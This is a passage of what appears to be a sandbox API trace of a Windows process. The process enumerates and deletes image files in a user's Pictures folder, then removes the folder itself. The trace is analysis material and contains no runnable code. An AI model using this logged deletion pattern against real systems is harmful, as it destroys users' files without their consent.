lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xddd59160, ftCreationTime.dwHighDateTime=0x1d4c9e2, ftLastAccessTime.dwLowDateTime=0xa83c4490, ftLastAccessTime.dwHighDateTime=0x1d4d57c, ftLastWriteTime.dwLowDateTime=0xa83c4490, ftLastWriteTime.dwHighDateTime=0x1d4d57c, nFileSizeHigh=0x0, nFileSizeLow=0x8065, dwReserved0=0x15de, dwReserved1=0x4, cFileName="KvxCp9rIgXmOE8y_PFP.png", cAlternateFileName="KVXCP9~1.PNG")) returned 1 [0255.568] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\itO8mb4FwKJbnFD\\KvxCp9rIgXmOE8y_PFP.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ito8mb4fwkjbnfd\\kvxcp9rigxmoe8y_pfp.png")) returned 1 [0255.569] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabb5c0, ftCreationTime.dwHighDateTime=0x1d4cda8, ftLastAccessTime.dwLowDateTime=0x5219e1f0, ftLastAccessTime.dwHighDateTime=0x1d4d16f, ftLastWriteTime.dwLowDateTime=0x5219e1f0, ftLastWriteTime.dwHighDateTime=0x1d4d16f, nFileSizeHigh=0x0, nFileSizeLow=0x153bf, dwReserved0=0x15de, dwReserved1=0x4, cFileName="qx7lnELi2Gl.png", cAlternateFileName="QX7LNE~1.PNG")) returned 1 [0255.569] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\itO8mb4FwKJbnFD\\qx7lnELi2Gl.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ito8mb4fwkjbnfd\\qx7lneli2gl.png")) returned 1 [0255.570] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6337de60, ftCreationTime.dwHighDateTime=0x1d4c87d, ftLastAccessTime.dwLowDateTime=0xfbc98010, ftLastAccessTime.dwHighDateTime=0x1d4c743, ftLastWriteTime.dwLowDateTime=0xfbc98010, ftLastWriteTime.dwHighDateTime=0x1d4c743, nFileSizeHigh=0x0, nFileSizeLow=0x2b8f, dwReserved0=0x15de, dwReserved1=0x4, cFileName="QxtGJYT.gif", cAlternateFileName="")) returned 1 [0255.570] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\itO8mb4FwKJbnFD\\QxtGJYT.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ito8mb4fwkjbnfd\\qxtgjyt.gif")) returned 1 [0255.570] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc25f93a0, ftCreationTime.dwHighDateTime=0x1d4ca13, ftLastAccessTime.dwLowDateTime=0x64469d40, ftLastAccessTime.dwHighDateTime=0x1d4d418, ftLastWriteTime.dwLowDateTime=0x64469d40, ftLastWriteTime.dwHighDateTime=0x1d4d418, nFileSizeHigh=0x0, nFileSizeLow=0x67d2, dwReserved0=0x15de, dwReserved1=0x4, cFileName="RI54gaY3v2xhv3N.jpg", cAlternateFileName="RI54GA~1.JPG")) returned 1 [0255.571] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\itO8mb4FwKJbnFD\\RI54gaY3v2xhv3N.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ito8mb4fwkjbnfd\\ri54gay3v2xhv3n.jpg")) returned 1 [0255.571] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21f71140, ftCreationTime.dwHighDateTime=0x1d4c581, ftLastAccessTime.dwLowDateTime=0xb0b1b0, ftLastAccessTime.dwHighDateTime=0x1d4cfbf, ftLastWriteTime.dwLowDateTime=0xb0b1b0, ftLastWriteTime.dwHighDateTime=0x1d4cfbf, nFileSizeHigh=0x0, nFileSizeLow=0x7ab6, dwReserved0=0x15de, dwReserved1=0x4, cFileName="wTpIsE7g2dl2EM.gif", cAlternateFileName="WTPISE~1.GIF")) returned 1 [0255.571] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\itO8mb4FwKJbnFD\\wTpIsE7g2dl2EM.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ito8mb4fwkjbnfd\\wtpise7g2dl2em.gif")) returned 1 [0255.572] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa37ed780, ftCreationTime.dwHighDateTime=0x1d4c81e, ftLastAccessTime.dwLowDateTime=0xf6496e90, ftLastAccessTime.dwHighDateTime=0x1d4d047, ftLastWriteTime.dwLowDateTime=0xf6496e90, ftLastWriteTime.dwHighDateTime=0x1d4d047, nFileSizeHigh=0x0, nFileSizeLow=0x123c3, dwReserved0=0x15de, dwReserved1=0x4, cFileName="Zusn7d.png", cAlternateFileName="")) returned 1 [0255.572] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\itO8mb4FwKJbnFD\\Zusn7d.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ito8mb4fwkjbnfd\\zusn7d.png")) returned 1 [0255.573] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa37ed780, ftCreationTime.dwHighDateTime=0x1d4c81e, ftLastAccessTime.dwLowDateTime=0xf6496e90, ftLastAccessTime.dwHighDateTime=0x1d4d047, ftLastWriteTime.dwLowDateTime=0xf6496e90, ftLastWriteTime.dwHighDateTime=0x1d4d047, nFileSizeHigh=0x0, nFileSizeLow=0x123c3, dwReserved0=0x15de, dwReserved1=0x4, cFileName="Zusn7d.png", cAlternateFileName="")) returned 0 [0255.573] FindClose (in: hFindFile=0xaa57a0 | out: hFindFile=0xaa57a0) returned 1 [0255.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0255.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0255.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0255.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0255.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0255.573] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0255.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0255.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0255.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0255.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0255.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0255.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0255.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0255.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0255.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0255.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0255.574] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0255.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0255.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0255.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fc0 [0255.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0255.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0255.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8dc0 [0255.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0255.574] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0255.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0255.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0255.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0255.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0255.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0255.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0255.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0255.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0255.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0255.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0255.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0255.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0255.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0255.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0255.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0255.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0255.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24b3190 [0255.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0255.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0255.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0255.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0255.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0255.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0255.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0255.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0255.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0255.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0255.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0255.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0255.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0255.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0255.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0255.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0255.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0255.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0255.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0255.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0255.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0255.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0255.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6e) returned 0x240c8d0 [0255.576] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/itO8mb4FwKJbnFD", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\itO8mb4FwKJbnFD", lpFilePart=0x8bf658*="itO8mb4FwKJbnFD") returned 0x36 [0255.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c8d0 | out: hHeap=0x25c0000) returned 1 [0255.576] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\itO8mb4FwKJbnFD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ito8mb4fwkjbnfd")) returned 0x10 [0255.576] SHFileOperationW (in: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\itO8mb4FwKJbnFD", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\xb2b4\xab1d\xce0f\xf32c\xfed3\x3518\x1497\x3255\x9b\x42f\x2770\x1236\x8bde\x6231\xf299\xa566\xc764\xd08\x3270\xabe8\xd3f2\x7909\x74a8\x967\x8f6f\xaf90\xf915\xae08\xa4ac\xb7c1\x65de\xf5ff\xd060\x1ba3\xdfb0\xec21\xc92d\xc9de\x615e\x1a38\x71db\xe234\x7cf9\x590f\xe21d\x7ea4\xb71c\xaaa\xb5d9\x7197\x824a\x5f09\x638f\x2ece\xe1e1\x3959\x3a11\x362\x3c05\x4bc7\x9c2d\x6bad\x59b4\x72b3\x403c\xb346\x8b9b\xa8e2\x6037\x34f3\x22a1\x3034\xa279\xaac0\x5908\xa09\xc98a\x2146\xeffb\x7266\xfce1\xc993\x5c\xee7d\x9436\xed71\xb319\x9430\x795a\xd71b\x1f9c\x9113\x4473\xb3e4\xb222\x445c\xe6ee\xf691\x22e5\x2354\x594a\x4229\xcc5f\xa1e4\x22a5\x4e34\x1e84\xa114\x2281\xa2df\xb8db\x6057\xef54\xdbbd\xb081\x1f89\x5249\xeabd\xadc4\x21d\x513\xf6d8\xa91f\x9bb7\x2426\xf8ba\x4923\xb024\xa488\xac2a\xb5db\x3871\x291f\xd4eb\x5287\xe1c4\x9313\xa1b1\xbbd\x482\x3e87\x7b14\x1f48\x514a\x347d\xbf42\x6d11\xbf51\x6d98\x7743\xd5ea\x494e\x8587\x16ef\x2a07\x3311\x7d90\xdbc0\xc724\xceb9\xbd82\x3b6c\x3fcb\xb38c\x3ced\xc52c\x76d9\x1cf6\x8f3b\x76d\x9165\x6719\xbc09\x1e88\x774\x2c7a\xe82e\x2cc2\x4dd\x6e45\x1b8b\x3d9b\x41d1\x5eb8\xba13\xe645\x909e\x6c8d\x8c1a\xfd72\xa744\xb67c\x47a7\x5c74\x1eca\x3742\x438b\x1f7a\xfd42\x660e\x2ee3\x4512\xa90e\xdf3e\x9319\x8db7\xf887\xb5c8\x207e\xdba1\xeaa5\x8ba8\x9e3\xda66\xedc9\xa1a0\x8171\x3ed9\x751\xdf09\x5337\xf668\x9076\x8de3\x63f1\x4a20\x240a\x4f1\x32ec\x6d00\x63ea\x8493\xa119\x2ea3\x6fb2\x3b85\xb8b2\xbb19\x1069\xfa26\xeffc\x375c\xdc4b\x4e84\xbb7d\x346\xe2a\x7f\xbd8a\x536\xe58b\x6d18\x284f\x9446\x2ae1\xd6e\x8c0c\xe9fd\xd007\x62dc\xeaff\x8e01\x7388\xf1b9\x3905\xd079\xf3e\x1aa2\xd7ec\xc43\xdb56\xbf60\xb166\x2950\xec1b\x4437\xaade\xb951\x8b24\x106a\xafe7\x9cc5\x360d\xd2d9\x9e2b\xfea6\x3a69\xac16\x5cd9\x48d1\xcd18\xdfd4\x2344\xe321\xc3ae\x70d0\xca86\xb1ad\xa73d\xfcee\x78fe\x5b20\x4281\x2a6a\x832f\xfce\x2d59\x15bc\xa7b3\xb447\x7a7f\x1e98\xd2f2\xe56d\x2cdf\xe7d6\xe7df\x3ba5\xba54\x2d4f\xbcef\xf177\x7f7c\xd7f9\xe693\xe2f\xe650\xae4d\x4d0b\xbd92\xdbc9\xe554\x6dc9\xf96a\x6a37\x5f40\x96a8\x9f1f\x58bf\xd7bf\x7c97\xfca8\x9178\xe05a\x26f5\xca1f\x9e53\xcfac\x526e\xf65e\x7962\xd08d\x1b0c\x92b0\x1f14\xd408\xd337\xf2d6\x3a4f\x346f\xf295\x3553\xb209\x67a4\x9f96\x9b9a\x9160\x91f4\xa7e5\xf18a\xb439\xdb7c\x9386\x83df\xe5da\xea5a\x9b26\x5db0\x897c\xfe55\xa7b0\x8074\xda97\x2fef\x4191\x6986\xbd94\xfb41\xf03d\x4e1a\xb884\xe15b\xf25\xf644\x6aa1\xc7f9\xd292\xa8a9\x27e5\x6525\xb4ae\x1922\xda12\x6120\xc02e\x51ab\xf067\x15b0\xb023\xf455\xd074\xc6e6\xc6f9\x2946\x3f9b\x53ed\x498a\x902d\x2fb4\xf16\x331\xb4a\xec1b\xb4ea\xe8\xe079\xf0d\x2029\x6868\x58e9\x5c7c\x7a58\x8365\x387d\x5bc4\x8a79\xf0c1\xde86\x79f7\xd5d\x7d2e\x8340\xedd\x3b61\x9887\x6553\x4ae9\x7049\x173b\x124a\x8819\x59ff\x8adc\x4e5\x44ba\x2c9b\x42c8\xd983\x406e\x6d5\x2069\x1f62\x1f45\x7437\xc1be\x5305\xf743\xd4a3\x87b2\x1bb9\x4424\x7310\xd0d4\x716d\x643a\x996f\x8b96\x206b\xa0db\x5013\x6a87\x36ec\xc87d\xdf85\x6823\x98b3\xcc2e\xa034\x5de5\x6b92\xf4bf\x5941\x725a\x9011\x66c8\x7768\x3288\x87e8\xb527\x443f\x43d2\x32aa\x23e9\xf3d5\x6051\xd9fb\x2bd6\xc64\xa22b\x5942\x8fdd\x4fd7\x36c7\x7101\x2b60\x1378\x72b0\x3c36\xb956\x241b\x175b\xac54\xc542\xec74\x900b\x5232\xeefd\xaa9e\xfe77\xd54c\x5bff\x23df\xc